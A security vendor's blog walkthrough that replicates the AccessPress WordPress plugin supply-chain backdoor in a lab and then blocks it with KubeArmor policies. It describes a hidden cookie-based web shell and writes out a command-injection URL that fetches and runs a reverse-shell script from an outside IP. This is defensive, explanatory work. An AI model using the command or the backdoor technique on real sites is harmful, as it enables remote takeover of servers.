Introduction

WordPress is the most popular and easiest way to create your website or blog. WordPress is likely to power more than one-fourth of the websites you visit.

WordPress is an open-source content management system released under the GPLv2 license, which means that anybody can use or change the WordPress software for free. As a result, WordPress is much more prone to attacks and vulnerabilities.

In this blog, we’ll be looking at one of the recent supply chain attacks that hit WordPress.

What is the actual vulnerability?

AccessPress, a popular WordPress plugin, and theme author was recently compromised, and their software was replaced with backdoored versions, according to security researchers at Automattic. In other words, rather than physically compromising systems by exploiting vulnerable software components, attackers gained access to the very source that websites and network administrators use. By doing so the attackers gained access to almost all the systems that use the said plugins and themes.

How did this happen?

To better understand the vulnerability and how it is working, let’s go ahead and replicate it in a controlled environment.

We will create a new Kubernetes cluster with default values.

Kubernetes cluster

Once the cluster is ready we’ll deploy the WordPress application with a vulnerable plugin to simulate the attack.

For this, we have created a complete YAML for WordPress installation on Kubernetes. You can use this predefined deployment file to quickly deploy WordPress to your Kubernetes environment.

kubectl apply -f https://raw.githubusercontent.com/accuknox/samples/main/wordpress-demo/k8s-wordpress.yaml

YAML

With this, the initial setup is completed. It’s time to upload the vulnerable plugin and dissect the attack pattern.

The Supply Chain Attack Tree

To explain the vulnerability, let’s take a look at the root cause of this issue,  the supply chain attack.

After gaining access to the AccessPress website, the attackers installed PHP backdoors in many of the group’s free software components. There were 40 themes and 53 plugins that were known to be impacted.

Supply chain attack tree

The backdoor was simple, yet it gave the attackers complete access to the victim’s web pages. The first thing they did was create a new file called initial.php in the main plugin directory, which they then included in the main function code.

We’ll use a slightly modified version of the exploit code to show the workflow.

Exploit code

Since this is etched into the source code of the plugin’s source code itself, it’ll execute the moment you download and activate the plugin.

This simple code created a new file in the plugin or theme folder respectively and started its execution by adding values to the vars.php file.

The malicious extensions featured a web shell dropper, giving the attackers complete access to the affected sites. The dropper can be found in the inital.php file in the plugin or theme’s main directory. It creates a cookie-based web shell in wp-includes/vars.php when it is activated. The shell is installed as a function named wp_is_mobile_fix() immediately before the wp_is_mobile() function to avoid arousing suspicion even if someone casually browses the vars.php file.

Php file

The file also connects to a malicious URL to further receive queries and remove the dropper file once execution is completed to avoid traces.

Once the execution is completed you will notice that the vars.php file now has an extra function wp_is_mobile_fix() created by the dropper file.

Let’s see this in action.

To replicate the issue, we will upload accesspress-anonymous-post-v2.8.0.

You can download the vulnerable version from samples/WordPress-demo at main · accuknox/samples

Once uploaded and activated we will execute inside the WordPress pod to confirm the changes.

kubectl exec -it $(kubectl get pod -ltier=frontend -o name | cut -d / -f2) — bash

WordPress pod

Alright! Now we will check for initial.php and vars.php. (Since the exploit deletes the initial.php once execution is completed it is highly unlikely to see the initial.php file. But the file will be downloaded to wordpress-root-folder/wp-content/plugins/ or wordpress-root-folder/wp-content/themes/ accordingly.). It also downloads a PHP payload acc.php which can cause RCE.

Php file1

The exploit does its magic and installed a shell inside the vars.php file. if the request’s user agent string is wp_is_mobile and contains eight specified cookies It assembles and runs a payload from the cookies provided.

Php file

An attacker can craft make use of this and send in crafted commands to get information or even escalate it into an RCE.

To see it in action let us get the IP of our WordPress pod

WordPress pod2

http://34.66.11.191/acc.php?cmd=curl+-s+http://152.67.166.153/script.sh+|+bash

The script.sh file has a bash reverse shellcode embedded in it. So once we go to this URL we’ll get a reverse shell connection established.

Shell code

You can download the script.sh file samples/wordpress-demo at main · accuknox/samples

Providing Run-time protection and defence

Providing Run-time protection and defending against the vulnerability with AccuKnox Open-source tools

Accuknox enables the ability to protect your workloads at run-time. Accuknox enables this by allowing you to configure policies (or auto-discover them) for application and network behavior using KubeArmor, Cilium, and Auto Policy Discovery tools

KubeArmor, is open-source software that enables you to protect your cloud workload at run-time.

The problem that KubeArmor solves is that it can prevent cloud workloads from executing malicious activity at runtime.  Malicious activity can be any activity that the workload was not designed for or is not supposed to do.

Given a policy, KubeArmor can restrict the following types of behavior on your cloud workloads:

• File access – allow/deny specific paths
• Allow / deny Process execution / forking
• Allow / Deny Establish network connections
• Allow / Deny workloads to request other capabilities with the host os. Such capabilities can enable additional types of malicious behavior.

Cilium, is an open-source project to provide eBPF-based networking, security, and observability for cloud-native environments such as Kubernetes clusters and other container orchestration platforms.

We will be able to block this attack by enforcing a simple system policy via KubeArmor; the policy is as follows:

KubeArmor policy

The Policy: In-action

Policy template

After applying the policy let’s go ahead and upload the plugin again to see what happens. The policy blocks the creation of initial.phpfile and denies RCE via the acc.php

Checking the policy logs on KubeArmor

There are two ways we can check policy logs on KubeArmor.

Using kubearmor.log

The traditional way is all about finding the KubeArmor pod running on the same node as the application pod and executing inside it to find logs.

1. Get the node name which your application pod is running

Pod

2. We will take the node name gke-wordpress-demo-default-pool-1cc20b06-7nfl and check for the KubeArmor pod running on it.

Kubearmor pod

3. We got to know that kubearmor-xh4zb the pod is running on node gke-wordpress-demo-default-pool-1cc20b06-7nfl.

4. Let us execute into the pod and watch the logs (you watch the entire logs or grep it with keywords like policy name)

Policy

5. Blocked Log Created by KubeArmor

Blocked log

Using kArmor

kArmor is a CLI client to help manage KubeArmor. With kArmoryou can get the logs in 2 steps

1. Download and Install kArmor CLI (if not present)

curl -sfL https://raw.githubusercontent.com/kubearmor/kubearmor-client/main/install.sh | sudo sh -s — -b /usr/local/bin

2.Enable port-forwarding for KubeArmor relay

3.   Observing logs using kArmor cli

4.   Blocked Log Created by kArmor

Word press supply chain attack

Auto Policy Discovery for your WordPress Application

Even though writing KubeArmor and CIlium (System and Network) policies are not a big challenge AccuKnox opensource has it simplified one step further by introducing a new CLI tool for Auto Discovered Policies. The Auto-Discovery module helps users by identifying the flow and generating policies based on it.

Discovering policies has never been better with Auto Discovery. In two simple commands, you can set up and generate policies without having any trouble.

To auto-discover policies, execute the following command

curl -s https://raw.githubusercontent.com/accuknox/tools/main/get_discovered_yamls.sh | bash

You should be able to see the following output.

Discoveries policy

In mere seconds after installing executing auto policy discovery tool, it generated 10 Cilium policies and 3 KubeArmor policies.

Auto Discovery was able to discover network-level policies that allow communication from WordPress frontend pod to MySQL pod only via port 3306 thereby eliminating the possibility of any attacks on MySQL pod from external or internal rogue pods.

MySQL pod

These features by AccuKnox open-source make sure that all the necessary policies to secure your workload are generated and ready to be used in a single click.

Accuknox’s policy templates repository

Accuknox’s policy templates is an open-source repo that contains a wide range of attack prevention techniques, including MITRE and hardening techniques for your workloads. Please visit GitHub – kubearmor/policy-templates: Community curated list of System and Network policy templates for the KubeArmor and Cilium to download and apply policy templates.

Conclusion

Even though supply-chain attacks are more brutal to avoid and protect from, with AccuKnox opensource tools, you can prevent your workloads from possible threats and vulnerabilities.

Using AccuKnox open-source tools, an organization can effectively protect against all sorts of accidental developer-introduced vulnerabilities and/or known/unknown vulnerabilities.

Now you can protect your workloads in minutes using AccuKnox, it is available to protect your Kubernetes and other cloud workloads using Kernel Native Primitives such as AppArmor, SELinux, and eBPF.

Let us know if you are seeking additional guidance in planning your cloud security program.